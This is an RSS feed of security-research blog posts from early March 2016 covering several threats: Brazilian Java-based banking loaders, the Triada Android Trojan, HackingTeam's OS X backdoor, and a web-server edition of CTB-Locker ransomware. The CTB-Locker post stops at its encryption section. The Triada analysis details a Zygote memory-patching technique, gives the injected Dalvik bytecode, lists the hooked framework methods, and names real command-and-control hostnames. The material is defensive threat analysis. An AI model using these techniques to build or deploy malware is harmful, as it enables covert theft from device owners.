Malware RSS Feed

First step in cross-platform Trojan bankers from Brazil done

Malware Alerts - Thu, 03/03/2016 - 10:57

Brazilian cybercriminals have been “competing” with their Russian-speaking “colleagues” for a while in who makes more Trojan bankers and whose are most effective. A few days ago we found a new wave of different campaigns spreading the initial “Banloader” components in Jar (Java archive), which is very particular by its nature – it’s able to run on Linux, OS X, and of course Windows. Actually, it’s also able to run under certain circumstances even on mobile devices.

Social engineering

Social engineering actually varies from vehicle taxes or fines to boleto’s payment system and even a kind of electronic debt call center.

Some emails come with download links to Jar files, while others directly spread Jar inside archives, so the end user does not need to download anything from the Internet.

Infection

Everything happens when the victims make a click – and we should remember Brazilian cybercriminals are experts in social engineering. So, right, the victim makes a click. What happens next? That also varies. It depends on which group is behind that particular attack. We say this because we have seen different cyber-criminal gangs from Brazil that are clearly not related actively using Jar files to seed bankers.

The fact is, as long as the victim has Java locally installed, the “Banloader” will run and it doesn’t matter if it’s OS X, Linux or Windows.

Some groups just go for traditional PAC modifications, redirecting victims to fake bank websites:

While others work with slightly more complex obfuscating Jar routines using DES or RSA algos.

Once deobfuscated it’s clear it drops a file to the system, which is actually the Banker in charge of stealing the victim’s money:

Interesting strings

Whether it’s intentional or not, the cybercriminals left strings. Here are the strings found in different Jar-based Trojan Banker samples:

liberdade” – freedom, liberty
maravilha” – miracle, thing of beauty

Why is it important?

Because Jar files run on Windows, OS X and Linux, wherever Java is installed. This is the very first step cybercriminals from Brazil have made towards “cross-platforming“.

What does it mean?

Brazilian Trojan Banker coders are now making Trojans running on all platforms and not only Windows.

Does it mean that OS X and Linux users are now also a target of Brazilian bankers?

Not yet. We say this because the banloaders (initial components) come in Jar but the final components (dropped malware) are still designed to run in Windows or they use a Windows system in the case of PAC abusing. However, it’s clear the first step to cross-platforming has just been made. So, it’s a matter of time till we will find Brazilian bankers running on all platforms.

Are Brazilian coders going to release full bankers – bandleaders and bankers running exclusively on Jar?

There is no reason to believe they won’t. They have just started and they won’t stop.

How stealthy is their Jar malware?

Actually, the general detection rate for ALL AV vendors is extremely low.

What is the detection name Kaspersky Lab products use to detect this threat?

Depending on the characteristics of each sample it may fall into one of the following families:

Trojan-Banker.Java.Agent
Trojan-Downloader.Java.Banload
Trojan-Downloader.Java.Agent

Where are most of the victims located?

Naturally Brazil, Spain and then Portugal, the United States, Argentina and Mexico.

Why are there victims in Germany and China?

The same malware techniques have been used by other threat actors and detected under the same malware family.

Attack on Zygote: a new twist in the evolution of mobile threats

Malware Alerts - Thu, 03/03/2016 - 06:58

The main danger posed by apps that gain root access to a mobile device without the user’s knowledge is that they can provide access to far more advanced and dangerous malware with highly innovative architecture. We feared that Trojans obtaining unauthorized superuser privileges to install legitimate apps and display advertising would eventually start installing malware. And our worst fears have been realized: rooting malware has begun spreading the most sophisticated mobile Trojans we have ever seen.

Rooting malware

In our previous article we wrote about the increasing popularity of malware for Android that gains root access to a device and uses it to install apps and display aggressive advertising. Once this type of malicious program penetrates a device, it often becomes virtually impossible to use it due to the sheer number of annoying ads and installed apps.

Since the first article (August 2015), things have changed for the worse – the number of malware families of this type has increased from four to 11 and they are spreading more actively and becoming much better at “rooting”. According to our estimates, Trojans with superuser privileges attacked about 10% of Android-based mobile devices in the second half of 2015. There were also cases of these programs being pre-installed on new mobile devices coming from China.

However, it’s worth noting that Android-based devices running versions higher than 4.4.4 have much fewer vulnerabilities that can be exploited to gain root access. So basically, the malware targets earlier versions of the OS that are still installed on the majority of devices. The chart below shows the distribution of our product users by Android version. As can be seen from the chart, about 60% use a device on which these Trojans can gain root access.

Versions of Android OS used by users of our products

The owners of the Trojans described above, such as Leech, Ztorg, Gorpo (as well as the new malware family Trojan.AndroidOS.Iop) are working together. Devices infected by these malicious programs usually form a kind of “advertising botnet” via which advertising Trojans distribute each other as well as the advertised apps. Within a few minutes of installing one of these Trojans, all other active malware on the “network” is enabled on the victim’s device. Cybercriminals are cashing in on advertising and installing legitimate applications.

In 2015, this “advertising botnet” was used to distribute malware posing a direct threat to the user. This is how one of the most sophisticated mobile Trojans we have ever analyzed was spread.

Unique Trojan

The “advertising botnet” mentioned above was used to distribute a unique Trojan with the following features:

  • Modular functionality with active use of superuser privileges
  • Main part of malicious functionality exists in device RAM only.
  • Trojan modifies Zygote system process in the memory to achieve persistence.
  • Industrial approaches used in its development, suggesting its authors are highly qualified.

The Trojan is installed in the folder containing the system applications, under names that system applications are likely to have (e.g. AndroidGuardianship.apk, GoogleServerInfo.apk, USBUsageInfo.apk etc.).

Before starting work, the malicious program collects the following information:

  • Name of the device
  • Version of the operating system
  • Size of the SD card
  • Information about device memory (from the file /proc/mem)
  • IMEI
  • IMSI
  • List of applications installed

The collected information is sent to the cybercriminals’ server whose address the Trojan receives from a list written in the code:

  • bridgeph2.zgxuanhao.com:8088
  • bridgeph2.zgxuanhao.com:8088
  • bridgeph3.zgxuanhao.com:8088
  • bridgeph3.zgxuanhao.com:8088
  • bridgeph4.zgxuanhao.com:8088
  • bridgeph2.viewvogue.com:8088
  • bridgeph3.viewvogue.com:8088
  • bridgeph3.viewvogue.com:8088
  • bridgeph4.viewvogue.com:8088

Or, if the above servers are unavailable, from a list of reserve command servers also written in the code:

  • bridgecr1.tailebaby.com:8088
  • bridgecr2.tailebaby.com:8088
  • bridgecr3.tailebaby.com:8088
  • bridgecr4.tailebaby.com:8088
  • bridgecr1.hanltlaw.com:8088
  • bridgecr2.hanltlaw.com:8088
  • bridgecr3.hanltlaw.com:8088
  • bridgecr4.hanltlaw.com:8088

In reply, an encrypted configuration file arrives and is stored as /system/app/com.sms.server.socialgraphop.db. The configuration is regularly updated and contains the following fields:

  • mSericode – malware identifier
  • mDevicekey – the device identifier generated on the server (stored in /system/app/OPBKEY_< mDevicekey >);
  • mServerdevicekey – the current server identifier
  • mCD – information used by cybercriminals to adjust the behavior of the modules;
  • mHeartbeat – execution interval for the “heartbeatRequest” interface
  • mInterval – interval at which requests are sent to the command server
  • mStartInterval – time after which the uploaded DEX files (modules) are run
  • mServerDomains – list of main domains
  • mCrashDomains – list of reserve domains
  • mModuleUpdate – links required to download the DEX files (modules).

If the mModuleUpdate field is not filled, the DEX files are downloaded and saved. Then these files are downloaded in the context of the malicious program using DexClassLoader.loadClass(). After that, the modules are removed from the disk, i.e. they only remain in device memory, which seriously hampers their detection and removal by antivirus programs.

The downloaded modules should have the following interface methods for proper execution:

  • init(Context context) – used to initialize the modules
  • exit(Context context) – used to complete the work of the modules
  • boardcastOnReceive(Context context, Intent intent) – used to redirect broadcast messages to the module;
  • heartbeatRequest(Context context) – used to initiate the module request to the command server. It is needed in order to obtain the data module required by the server;
  • heartbeatResponce(Context context, HashMap serverResponse) – used to deliver the command server response to the module.

Depending on the version, the following set of interfaces may be used:

  • init(Context context) – used to initialize the modules
  • exec() – used to execute the payload
  • exit(Context context) – used to complete the work of the modules

This sort of mechanism allows the app downloader to execute modules implementing different functionality, as well as coordinating and synchronizing them.

The apps and the loaded modules use the “android bin”, “conbb”, “configopb”, “feedback” and “systemcore” files stored in the folder /system/bin to perform various actions on the system using superuser privileges. It goes without saying that a clean system does contain these files.

Considering the aforementioned modular architecture and privileged access to the device, the malware can create literally anything. The capabilities of the uploaded modules are limited only by the imagination and skills of the virus writers. These malicious programs (the app loader and the modules that it downloads) belong to different types of Trojans, but all of them were all included in our antivirus databases under the name Triada.

At the time of analysis the app downloader (detected by us as Backdoor.AndroidOS.Triada) downloaded and activated the following modules:

  • OPBUpdate_3000/Calendar_1000 – two modules with duplicate functionality capable of downloading, installing and running an application (detected as Trojan-Downloader.AndroidOS.Triada.a).
  • Registered_1000 – module capable of sending an SMS upon the request of the command server. Detected as Trojan-SMS.AndroidOS.Triada.a.
  • Idleinfo_1000 – module that targets applications that use SMS to make in-app purchases (intercepts outgoing text messages). Detected as Trojan-Banker.AndroidOS.Triada.a.
Use of the Zygote process

A distinctive feature of the malicious application is the use of the Zygote process to implement its code in the context of all the applications on the device. The Zygote process is the parent process for all Android applications. It contains system libraries and frameworks used by almost all applications. This process is a template for each new application, which means that once the Trojan enters the process, it becomes part of the template and will end up in each application run on the device. This is the first time we have come across this technique in the wild; Zygote was only previously used in proof-of-concepts.

The chart below shows the architecture of the malicious program.

Let us take a closer look at how the Zygote process is infected.

Preparatory stage and testing

All the magic starts in the crackZygoteProcess() function from the Trojan-Banker module. Its code is displayed in the screenshot below.

First, the Trojan loads the shared library libconfigpppm.so and invokes the configPPP() function exported by this library (the first highlighted string on the screenshot). Second, if configPPP() succeeds in calling System.getProperty() from Android API with the unusual argument ‘pp.pp.pp’ (it will be explained later why this action is performed) and the returned value is not null, the Trojan runs the ELF-executable configpppi with the PID of the zygote process as an argument.

Let’s go through the process in order. The first thing the Trojan does inside the configPPP() function from libconfigpppm.so is to obtain the load address (in the address space of its process) of the file that implements the ActivityThread.main() function from Android API. Next, using the load address and /proc/self/maps, the Trojan discovers the name and path to the file on the disk. In most cases, it will be /system/framework/framework.odex.

The Trojan reads this file from disk and compares it with the file that is already loaded in the address space. The comparison is performed as follows:

  1. The file is divided into 16 blocks;
  2. The first 8 bytes of each block are read;
  3. These 8-byte sequences are compared with the corresponding sequences from the file that loaded in memory;

If the comparison fails, configPPP aborts its execution and returns a 103 error code. If the comparison succeeds, the Trojan starts patching framework.odex in memory.

Then, the malware obtains the Class structure of ActivityThread (which is defined in framework.odex) by using dexFindClass and dexGetClassData functions. The authors of the malware copied these functions from Dalvik Virtual Machine. The structure contains various information about a dex class and is defined in AOSP. Using the structure, Triada iterates through a list of methods implemented in this class looking for a method named “main”. After the method has been found, the Trojan obtains its bytecode with the help of the dexGetCode function (also copied from open sources). When the bytecode is obtained, it is compared with the corresponding bytecode from the file on the disk, thereby checking if the framework has already been patched. If the method has already been patched, the malware aborts its execution and returns a 103 error code.

After that, the Trojan starts looking for the first string in the DEX strings table that are between 32 and 64 symbols long. After a string has been found, the Trojan replaces it with “/system/lib/libconfigpppl.so” and saves its ID.

Next, Triada accesses the DEX methods table and tries to obtain a method with one of the following names – “loop“, “attach” or “setArgV0“. It takes the first one that occurs in the table, or, if there are no methods with these names, the penultimate method from the DEX methods table, and replaces it with a standard System.load() method (one that loads shared libraries to process address space) and saves its ID. The pseudocode that performs this manipulation is shown below.

After these actions, the preparatory stage is complete, and the Trojan performs the actual patching. It modifies the memory of the process, adding the following instructions to the bytecode of the “main” method of the ActivityThread class:

1A 00 [strID, 2 bytes]                    //const-string v0, “/system/lib/libconfigpppl.so”
71 10 [methID, 2 bytes] 00 00      //invoke-static {v0}, Ljava/lang/System;->load(Ljava/lang/String;)V
0E 00                                             //return-void

where strID is thesaved ID of the replaced string, and methID is the saved ID of the replaced method.

After these modifications, when ActivityThread.main() is called, it will automatically load the shared library “/system/lib/libconfigpppl.so” to the context of the caller process. But because framework.odex is only patched in the context of the Trojan process, the library will only be uploaded in the Trojan process. This seemingly meaningless action is performed in order to test the ability of the malicious program to modify the Zygote process. If the steps described above do not cause errors in the context of the application, they will not cause errors in the context of the system process. Such a complex operation as changing the Zygote address space has been approached very carefully by the attackers, since the slightest error in this process can result in immediate system failure. That is why the “test run” is performed to check the efficiency of the methods on the user’s device.

At the end configPPP() writes the following data to “/data/configppp/cpppimpt.db“:

  • ID of replaced string (4 bytes);
  • Content of replaced string (64 bytes);
  • ID of replaced method (4 bytes);
  • Pointer to the Method structure for replaced method (4 bytes);
  • Content of the Method structure for ActivityThread.main() (52 bytes);
  • Load address of framework.odex (4 bytes);
  • List of structures that contain (previously used for comparison, 192 bytes):
    1. Pointer to the next block of framework.odex;
    2. First 8 bytes of the block:
  • Size of framework.odex in memory (before patching) (4 bytes);
  • Pointer to the DexFile structure for framework.odex (4 bytes);
  • Content of the DexFile structure for framework.odex (44 bytes);
  • Pointer to the Method structure for System.load() (4 bytes);
  • Size of ActivityThread.main() bytecode before patching (4 bytes);
  • Bytecode of ActivityThread.main() before patching (variable);

Finally, the Trojan calls the patched ActivityThread.main(), thus loading /system/lib/libconfigpppl.so in its address space. We will describe the purpose of this library after explaining the functionality of the configpppi ELF-executable that performs the actual modification of Zygote’s address space.

Modification of the Zygote

In fact, configpppi also patches ActivityThread.main() from framework.odex, but unlike libconfigpppm.so, it receives the PID of a process running on the system as an argument and performs patching in the context of this process. In this case, the Trojan patches the Zygote process. It uses information obtained at the previous stage (in libconfigpppm.so) and stored in /data/configppp/cpppimpt.db to modify the Zygote process via ptrace system­­­­­ calls.

The Zygote process is a daemon whose purpose is to launch Android applications. It receives requests to launch an application through /dev/socket/zygote. Every launch request triggers a fork() call. When fork() occurs the system creates a clone of the process – a child process that is a full copy of a parent. Zygote contains all the necessary system libraries and frameworks, so every new Android application will receive everything it needs to execute. This means every application is a child of the Zygote process and after patching, every new application will receive framework.odex modified by the Trojan (with libconfigpppl.so injected). In other words, libconfigpppl.so ends up in all new apps and can modify how they work. This opens up a wide range of opportunities for the cybercriminals.

Substitution of standard Android Framework features

When the shared library /system/lib/libconfigpppl.so is loaded inside the Zygote by System.load(), the system invokes its JNI_OnLoad() function. First, the Trojan restores the string and method replaced earlier by /system/lib/libconfigpppm.so or configpppi, using the information from /data/configppp/cpppimpt.db. Second, Triada loads the DEX file configpppl.jar. This is done with the help of a standard Android API via dalvik.system.DexClassLoader.

To ensure that DEX is successfully loaded, the Trojan calls its method pppMain from the PPPMain class. This method only outputs to logcat string “PPP main started”.

The next stage is to prepare hooks for some methods from Android Framework (framework.odex). The malware checks if everything necessary for hook methods exist in configpppl.jar (it uses the internal checkPackageMethodExits() method for this). The Trojan then prepares hooks for the following methods:

  1. java.lang.System.getProperty()
  2. android.app.Instrumentation.newApplication()
  3. com.android.internal.telephony.SMSDispatcher.dispatchPdus()
  4. android.app.ActivityManager.getRunningServices()
  5. android.app.ActivityManager.getRunningAppProcesses()
  6. android.app.ApplicationPackageManager.getInstalledPackages()
  7. android.app.ApplicationPackageManager.getInstalledApplications()

The hooks are placed using the standard RegisterNatives() function. This function is designed to perform binding Java methods with their native implementation (i.e. written with C/C++). Thus, the Trojan substitutes standard methods from Android Framework with methods implemented in libconfigpppl.so.

Verifying the success of a Zygote modification

The function which substitutes the original getProperty() first checks its argument. If the argument is the “pp.pp.pp” string (which was mentioned earlier), then the function immediately returns “true”. Otherwise, it calls the original getProperty() with its passed argument. Calling the hooked getProperty() with “pp.pp.pp” as an argument is used to check whether or not hooking of Android Framework functions was successful. If the hooked getProperty() returned “true”, then the Trojan will start configpppi ELF with the PID of the Zygote process as an argument.

After that, the the Trojan “kills” processes of the applications: “com.android.phone”, “com.android.settings”, “com.android.mms”. These are the standard “Phone”, “Settings” and “Messaging” – applications that are the Trojan’s primary targets. The system starts these apps automatically the next time the device is unblocked. After they start they will contain framework.odex with all the hooks placed by libconfigpppl.so.

Modification of outgoing text messages

The function which substitutes newApplication(), first calls the original function, and then invokes two functions from configpppl.jar: onModuleCreate() and onModuleInit().

The function onModuleCreate() checks in the context of the application it is running and then sets the global variable mMainAppType according to the results of checking:

  • If function is running within com.android.phone, then mMainAppType set to 1;
  • If function is running within com.android.settings or com.android.mms, then mMainAppType set to 2;
  • If function is running within one of these apps: com.android.system.google.server.info, com.android.system.guardianship.info.server, com.android.sys.op, com.android.system.op., com.android.system.kylin., com.android.kylines, com.android.email, com.android.contacts, android.process.media, com.android.launcher, com.android.browser, then mMainAppType set to -1;
  • If function is running within any other application, then mMainAppType set to 0;

Depending on the value of mMainAppType, the function onModuleInit() calls one of the initialization routines:

Thus, the Trojan tracks its host application and changes its behavior accordingly. For example, if mMainAppType is set to -1 (i.e. the host application is com.android.email, com.android.contacts etc.), the Trojan does nothing.

If the host application is com.android.phone, Triada registers broadcast receivers for the intents with actions com.ops.sms.core.broadcast.request.status and com.ops.sms.core.broadcast.back.open.gprs.network. It first sets the global variable mLastSmsShieldStatusTime to the current date and time, then turns on mobile network data (GPRS Internet).

If the host application is com.android.settings or com.android.mms, Triada registers broadcast receivers for the intents with the following actions:

  • com.ops.sms.core.broadcast.request.status;
  • com.ops.sms.core.broadcast.back.open.gprs.network;
  • com.ops.sms.core.broadcast.back.send.sms.address.

The first two are the same as in the previous case, and the third sends an SMS, which is passed off as extra intent data.

If the host application is any other app (apart from apps that trigger mMainAppType = -1), then Triada first checks whether or not the application uses the shared library libsmsiap.so:

Depending on the result, it calls one of the following functions: PISmsCore.invokeMMMain() or PISmsCore.invokeOtherMain().

Both functions invoke the PISmsCore.initInstance() method which performs the following actions:

  1. Initialization of the Trojan’s global variables with various information about the infected device (IMEI, IMSI etc.);
  2. Substitution of the system binders “isms” and “isms2”, which are used by the parent application along with its own ones;
  3. Creation of multiple directories /sdcard/Android/com/register/, used for write log and configuration files;
  4. Registration of broadcast receivers for intents with the actions com.ops.sms.core.broadcast.responce.shield.status and com.ops.sms.core.broadcast.responce.sms.send.status, which simply set the corresponding variables to record the time of an event;
  5. If a function is invoked from PISmsCore.invokeMMMain(), then a new thread is created. This thread enters an endless loop and turns on mobile network data, and won’t let the user turn it off.

The most interesting action among the above is the substitution of the system binders “isms” and “isms2”.

Binder is an Android-specific inter-process communication mechanism, and remote method invocation system. All communication between client and server applications within Binder pass through a special Linux device driver – /dev/binder. The scheme of inter-process communication via the Binder mechanism is presented below.

For example, when an application wants to send an SMS it calls the sendTextMessage (or sendMultipartTextMessage) function, which in fact leads to the transact() method of an “isms” (or “isms2”) binder object being called.

The transact() method is redefined in the malicious “isms” binder realization, replacing the original. So, when the parent application of the Trojan sends an SMS it leads to the call of the malicious transact() method.

In this method, the Trojan obtains SMS data (destination number, message text, service center number) from raw PDU. Then, if a network connection is available, it sends this data to a random C&C server from the following list:

  • bridgeph2.zgxuanhao.com:8088
  • bridgeph3.zgxuanhao.com:8088
  • bridgeph3.zgxuanhao.com:8088
  • bridgeph4.zgxuanhao.com:8088
  • bridgeph2.viewvogue.com:8088
  • bridgeph3.viewvogue.com:8088
  • bridgeph3.viewvogue.com:8088
  • bridgeph4.viewvogue.com:8088

The C&C server should respond with some data that, among other things, contains a new SMS destination address (number) and new SMS text.

If a network connection is not available, then the Trojan tries to find the appropriate data in the local configuration files that are stored in the /sdcard/Android/com/register/localuseinfo/ directory in encrypted form.

The Trojan then replaces the SMS destination address and the SMS text of the original message (obtained from C&C or local configuration files), and tries to send it in three different ways (simultaneously):

  1. Via the standard Android API function sendTextMessage. It will lead to the same malicious transact() method of the Trojan “isms” binder realization;
  2. By sending an intent with the action “com.ops.sms.core.broadcast.back.send.sms.address”. It will be received and processed by the same Trojan module but inside the “Messaging” or “Settings” application;
  3. By passing the new SMS destination address and new SMS text to the original “isms” binder transact() method.

When the Trojan sends an SMS in one of these ways, it saves the new SMS destination address and new SMS text in a special variable. And, before sending the new SMS, it checks if it has not already been sent. This helps to prevent endless recursive calls of the transact() method, meaning only one SMS will be sent per originally sent message (by the parent application).

Besides the PISmsCore.initInstance() function, PISmsCore.invokeMMMain() calls another function – PIMMCrack.initInstance(). This method tries to determine which version of mm.sms.purchasesdk the host application is using (the Trojan knows for sure that the host application is using this SDK, because it has checked for libsmsiap.so, which is part of this SDK). mm.sms.purchasesdk is the SDK of Chinese origin – it is used by app developers for enabling In-App purchasing via SMS.

Thus, the mechanism described in this chapter allows the Trojan to modify outgoing SMS messages that are sent by other applications. We presume that the Trojan authors use this opportunity to secretly steal users’ money. For example, when a user buys something in some Android game shop, and if this game uses SDK for in-app purchases via SMS (such as mm.sms.purchasesdk), the Trojan’s authors are likely to modify the outgoing SMS so as to receive the user’s money instead of the game developers. The user doesn’t notice that his money has been stolen; instead he presumes he hasn’t received the appropriate content and will then complain to the game developers.

Filtration of incoming text messages

The original dispatchPdus() is used (as shown in the diagram below) to dispatch PDUs (Protocol Data Unit, low-level data entity used in many communication protocols) of incoming SMS messages to the corresponding broadcast intent. Then, all applications that subscribed for the intent are able to receive and process, according to their needs, the text message that is contained in the form of PDUs inside of this intent.

The function which substitutes dispatchPdus() invokes the moduleDispatchPdus() method from configpppl.jar. It checks the host application and if the application is not com.android.phone, it informs and broadcasts to all apps in the system intent with the action android.provider.Telephony.SMS_RECEIVED (along with the received PDUs). This standard intent informs all other applications (e.g. “Messaging” or “Hangouts” of the incoming SMS).

If the host for the malware is com.android.phone, then Triada checks the originating address and message body of the incoming SMS. The information that the Trojan needs to check is contained within two directories: /sdcard/Android/com/register/infowaitreceive/ and /sdcard/Android/com/register/historyInfo/. The names of the files that are stored in these directories contain postfix, which signifies the date and time of the last response from the C&C. If these files were updated earlier than the last response was received, the Trojan deletes these files and aborts the checking of the incoming SMS. Otherwise, the malware decrypts all the files from the directories mentioned above and extracts phone numbers and keywords from them to perform filtering. If the SMS was received from one of these numbers or the message contains at least one keyword, the Trojan broadcasts an intent with the action android.provider.Telephony.SMS_RECEIVEDcom.android.sms.core along with the message. This is an intent with a custom action and only those applications that explicitly subscribe to this intent, will receive it. There are no such applications on “clean” Android devices. In addition, this method could be used to organize “exclusive” message distribution for Triada modules. If some of the new modules subscribe to the intent with the action android.provider.Telephony.SMS_RECEIVEDcom.android.sms.core, they will receive the filtered message exclusively, without any other applications on the system knowing about it.

Concealing Trojan modules from the list of running services

This function is used to obtain a list of all running services. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getRunningServices():

  • com.android.system.google.server.info
  • com.android.system.guardianship.info.server
  • com.android.sys.op
  • com.android.system.op.
  • com.android.system.kylin.
  • com.android.kylines.
Concealing Trojan modules from the list of running applications

This function is used to obtain a list of all running applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getRunningAppProcesses():

  • com.android.system.google.server.info
  • com.android.system.guardianship.info.server
  • com.android.sys.op
  • com.android.system.op.
  • com.android.system.kylin.
  • com.android.kylines.
Concealing Trojan modules from the list of installed packages

This function is used to obtain a list of all installed packages for applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getInstalledPackages():

  • com.android.system.google.server.info
  • com.android.system.guardianship.info.server
  • com.android.sys.op
  • com.android.system.op.
  • com.android.system.kylin.
  • com.android.kylines.
Concealing Trojan modules from the list of installed applications

This function is used to obtain a list of all installed packages for applications. The Trojan substitutes the function to hide its modules from this list. The following modules will be excluded from the list received from the original getInstalledPackages():

  • com.android.system.google.server.info
  • com.android.system.guardianship.info.server
  • com.android.sys.op
  • com.android.system.op.
  • com.android.system.kylin.
  • com.android.kylines.
Conclusion

Applications that gain root access to a mobile device without the user’s knowledge can provide access to much more advanced and dangerous malware, in particular, to Triada, the most sophisticated mobile Trojans we know. Once Triada is on a device, it penetrates almost all the running processes, and continues to exist in the memory only. In addition, all separately running Trojan processes are hidden from the user and other applications. As a result, it is extremely difficult for both the user and antivirus solutions to detect and remove the Trojan.

The main function of the Trojan is to redirect financial SMS transactions when the user makes online payments to buy additional content in legitimate apps. The money goes to the attackers rather than to the software developer. Depending on whether or not the user gets the content he pays for, the Trojan either steals the money from the user (if the user does not receive the content) or from the legitimate software developers (if the user receives the content).

Triada has clearly been designed by cybercriminals who know the targeted mobile platform very well. The range of techniques used by the Trojan is not found in any other known mobile malware. The methods of concealing and achieving persistence used by Triada can effectively avoid detection and removal of all malware components after installation on the infected device; the modular architecture allows attackers to extend and alter the functionality so they are limited only by the capabilities of the operating system and applications installed on the device. Since the malware penetrates all applications installed on the system, the cybercriminals can potentially modify their logic to implement new attack vectors against users and maximize their profits.

Triada is as complex as any malware for Windows, which marks a kind of Rubicon in the evolution of threats targeting Android. Whereas previously, the majority of Trojans for the platform were relatively primitive, new threats with a high level of technical complexity have now come to the fore.

Hello from #RSA2016!

Malware Alerts - Wed, 03/02/2016 - 21:13

This week, a large fraction of the world’s top security professionals converge into the wonderful city of San Francisco for RSA Conference 2016.

Spread across several halls and buildings, the event has grown to be a kind of “meet anyone” type of conference/show, where you can’t walk for more than a 100 meters without running into a friend, colleague or customer. Perhaps it is no surprise that due to the popularity of the RSA Conference, many companies choose to announce new products or discoveries here.

I’m joined by some of my colleagues from GReAT: Kurt (@k_sec), Juan Andres (@juanandres_gs), Vicente (@trompi) and Brian (@Mao_Ware). The day began with Vicente’s presentation on the future of nation state-sponsored attacks. Looking at the evolution of these threats and actors over the past years from different angles, we can identify some patterns and evolutionary rules which can help predict what future attacks will look like. One of the most interesting points or predictions from Vicente’s presentation revolved around the idea that everyone knows how to do forensics on Microsoft Windows but very few can do it for network attached devices such as routers or smart power switches.

Vicente Diaz presents at RSA Conference 2016

This creates a blind spot that is undoubtedly being exploited by advanced threat actors to manage exfiltration of data from compromised networks and will become even more popular in the future.

The subject of targeted attacks is always on the agenda at RSA and Kaspersky Lab was also busy here with the announcement of a major expansion of its enterprise security portfolio. The new Kaspersky Anti Targeted Attack (KATA) platform was the main subject of a presentation from my colleague Juan Andres who was joined by Artem Serebrov.

Artem Serebrov and Juan Andres Guerrero-Saade introducing the KATA platform

The KATA platform is based on Kaspersky Lab’s expertise in the detection and analysis of some of the world’s most sophisticated cyber threats combined with several years of engineering and experience in developing security technologies.

You can find more details about KATA here: http://www.kaspersky.com/enterprise-security/anti-targeted-attacks

Moving from the realm of targeted attacks, my colleague Kurt presented on the evolution of the Internet of Threats (IoT) and automotive security. With things such as smart houses and why not, smart cities being a reality, security should play a major role as we take the first steps towards an interconnected world.

Kurt Baumgartner discussing threats against IoT and transportation systems

If you happen to be at #RSA2016 don’t forget to stop by our booth and have a chat!

Signing off from RSA,

@craiu

 

The return of HackingTeam with new implants for OS X

Malware Alerts - Wed, 03/02/2016 - 09:59

Last week, Patrick Wardle published a nice analysis of a new Backdoor and Dropper used by HackingTeam, which is apparently alive and well. Since HackingTeam implants are built on-demand for each target, and it appears that the samples mentioned in the blog were found in-the-wild, we wanted to take a closer look: to see how it works and what its functionality reveals about the possible interest of the attackers behind this latest Backdoor.

Encryption key

The main Backdoor component receives its payload instructions from an encrypted Json configuration file. In order to decrypt the configuration file, we began by using known keys, but none of them were able to decrypt the file. Upon checking the binary file we were able to identify that the function used to encode the file is still AES 128, so we started to look for a new encryption key. We located the initialization of the encryption routine, where the key is passed as an argument.

By following this code we were able to find the new key used to encrypt the configuration file.

As you can see, the key is 32 bytes long, so just the first 16 bytes are used as the key. By using this key on our script we successfully decrypted the configuration file, which turns out to be a Json format file carrying instructions on how that particular Backdoor needs to operate on the target’s OS X machine:

What does the implant do?
  • It takes screenshots
  • It synchronizes with or reports stolen information to a Linode server located in the UK, but only when connected to Wi-Fi and using a specific Internet channel bandwidth defined by the Json configuration file:
  • It steals information on locally-installed applications, address book entries, calendar events and calls. OS X allows iPhone users to make such calls straight from the desktop when both are connected to the same Wi-Fi network and trusted.
  • It spies on the victim by enabling frontal camera video recording, audio recording using the embedded microphone, sniffing local chats and stealing data from the clipboard.
  • It also steals emails, SMS and MMS messages from the victim, which are also available on the OS X desktop when an iPhone is paired.

Among other functionalities it also spies on the geolocation of the victim.

It’s interesting to note that the Json file says that the start date of the operation is October 16 (Friday), 2015. This indicates that this is a fresh HackingTeam Backdoor implant.

For some reason the attacker was not interested in any emails sent to or from the target before that date but only from then on.

Kaspersky Lab detects the above-mentioned Backdoor implants as Backdoor.OSX.Morcut.u and its dropper as Trojan-Dropper.OSX.Morcut.d

CTB-Locker is back: the web server edition

Malware Alerts - Tue, 03/01/2016 - 02:38

Cryptolockers have become more and more sophisticated, bypassing system protections and terrifying anyone in their path. TelsaCrypt, CryptoWall, TorrentLocker, Locky and CTB-Locker are only some of the malware we have protected from for the past two years. We have seen many shapes and colors of cryptolockers, but the new CTB-Locker variant says it all. The world of cybercriminals is investing in how to reinvent cryptolockers.

Before, CTB-Locker, or Onion Ransomware, differed from other ransomware in the usage of the Tor Project’s anonymity network to shield itself from takedown efforts that rely largely on static malware command and control servers. Its use of Tor also helped evading detection and blocking. Another thing that protected CTB-Locker controllers was accepting as payment only Bitcoins, the decentralized and largely anonymous crypto-currency known.

A new variant of the CTB-Locker targets web servers only, and to our knowledge it has already successfully encrypted web-root files in more than 70 servers located in 11 countries.

In this blogpost I will take you into the “lion’s den”, after victims were kind enough to share the cryptors that had been deployed into their web servers.

Step 1: defacement

This new variant aims to encrypt web servers and demand less than half a bitcoin as a ransom (~150 USD). If payment isn’t sent on time the ransom is doubled to approximately 300 USD. When paid, the decryption key is generated and is used to decrypt the web server’s files.

It has become clear that the web servers infected with this variant were targeted due to a security hole in their web server. Once exploited, the website is defaced. Defacement is a well-known method for hacking groups to show their victims they mean business. The most recent cases we’ve witnessed are not random, but mostly about political affiliations and cultural perspectives.

In this case, the defacement, which contains a replacement of the main php/html page, is used as the message carrier and contains all the means necessary for the attack to leave the right impression on the victim. We will deep-dive into it in the next steps.

It is important to mention that the original code is not deleted. It is stored safely in the web root with a different name in an encrypted state.

The message

As variants of malware of this kind are based on the simple fact that a victim cares more about his content than about paying a ransom, the authors usually leave a very detailed message for everyone to see.

The following quote is a part of the information that is left on the main page:

The decryption key is stored on a remote server, but the attackers were “kind enough” to allow the victim to decrypt two files free, as a sign of authenticity.

The other function that exists on the attacked website allows the victim to communicate with the attacker via chat: it requires a personal signature/code which is available for victims only.

At the moment, no decryption tool exists in the wild, thus there is no way to decrypt the files encrypted by the new CTB-Locker. The only way to remove this threat in a matter of seconds is to keep file backups in a separate location.

Although this seems like a big concern, we tend to believe that it is not. Large websites tend to have multiple versions of their content, spreading over a number of webservers. In many other cases, they are supervised and tested by professional security penetration testing firms and so are constantly under the magnifier.

Step 2: encryption process

